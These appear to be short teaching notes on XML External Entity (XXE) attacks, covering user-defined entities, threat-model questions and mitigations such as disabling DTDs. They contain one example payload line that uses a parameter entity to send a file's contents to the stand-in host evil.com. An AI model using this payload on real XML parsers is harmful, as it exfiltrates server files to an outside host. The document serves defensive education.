XML eXternal Entities
Added to the OWASP 10 in 2017
HTML “Entities” are the usual entrypoint.
& rendered, triggers.
XML has User-Defined Entities
<!eNTITY xml “Extensible Markup Language”>
<!ENTITY chapter1 SYSTEM "chapter1.txt">
Tag rendering executes call to find the contents of
chapter1.txt and render it.
Enables users to execute XML at the rendering phase, and access and return sensitive data.
<!ENTITY % all "<!ENTITY send SYSTEM 'http://evil.com/evil.html?payload=%file;'>" > %all;
Threat Model Questions to Ask
Does your server allow DTD? .Net is one of the primary vulnerabilities; .NET < 4.5.2 is vulnerable to default hacks.
- Do you allow external entities?(You shouldn’t)
- Do you validate un-trusted input?(You always should)
DO: Update Parsers, Disable DTD & XXE, validate input, if necessary set policies for resolving URLs.